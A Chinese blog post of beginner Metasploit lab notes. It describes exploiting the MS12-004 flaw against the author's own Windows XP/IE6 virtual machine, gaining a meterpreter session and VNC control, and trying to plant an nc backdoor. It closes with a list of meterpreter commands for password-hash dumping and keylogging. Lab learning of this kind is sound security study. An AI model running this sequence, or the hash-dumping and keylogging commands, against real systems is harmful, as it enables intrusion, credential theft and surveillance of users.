metasploit渗透测试学习笔记(一)

对metasploit非常感兴趣,所以最近看了很多的教程。这篇是我模仿作者Breaker写的一篇入门级渗透,真的很入门。还望大神忽视。 

单纯的想记录下我学习的结果zzzzzzzzzzzzzzzzzzzzz

环境:

1.kali Linux。

2.XP  IE6。


好的,如下zzz:


1.msfconsole


metasploit渗透测试学习笔记(一)_第1张图片

2输入命令 search ms12_004,找 ms12-004 漏洞的利用模块

metasploit渗透测试学习笔记(一)_第2张图片

3.使用那个模块

metasploit渗透测试学习笔记(一)_第3张图片

4.设置一些参数:SRVHOSTpayload(载荷) LHOST, URIPATH 

metasploit渗透测试学习笔记(一)_第4张图片

5显示参数 show options

metasploit渗透测试学习笔记(一)_第5张图片

6.利用exploit

metasploit渗透测试学习笔记(一)_第6张图片


7用另一个虚拟机XP进入Using URL :http://192.168.10.134:8080/

metasploit渗透测试学习笔记(一)_第7张图片

它已卡死,接着浏览器自动退了吧。
8.Sucessfully! 查看会话:sessions

metasploit渗透测试学习笔记(一)_第8张图片

9.连接会话sessions -i 1,进入了meterpreter,并截图,。

metasploit渗透测试学习笔记(一)_第9张图片

10.run vnc虚拟连接进入,控制主机

metasploit渗透测试学习笔记(一)_第10张图片


11.当然这样不算完结,还要留后门,下次进入。Upload一个nc,(⑥⑥⑥的瑞士军刀)

蛋蛋蛋但是,后门我不会啊,试了好多次没成功,感觉好难搞似得,下次再研究,这次先到这了,已成功拿下我的XP。。。。


好菜 。。。。好水,不怎么懂郁闷。。。。。。。。。。。。。。。。。。 

我去喝杯饮料压压惊。。。。。

常用的 Meterpreter命令

Meterpreter 是一个很强大的payload , 具体说明输入help可以看到,

Meterpreter hashdump // 可以看到进程主机帐号和加密后的密码

 keyscan_start //开启键盘记录

heyscan_dump // 查看键盘记

 keyscan_stop // 关闭键盘

 ps // 获取进程主机进程列表

好了感谢教程所有者:Breaker。!!  虽然不认识,但是给了我好大帮助,特别信心啊!!!

ps:后门不怎么懂(o)。)。哪位大神能否交流交流~~~~~~~~~~~~。

还有1分钟熄灯了,赶紧上传睡觉。

By:Zofrey


你可能感兴趣的:(metasploit渗透测试学习笔记(一))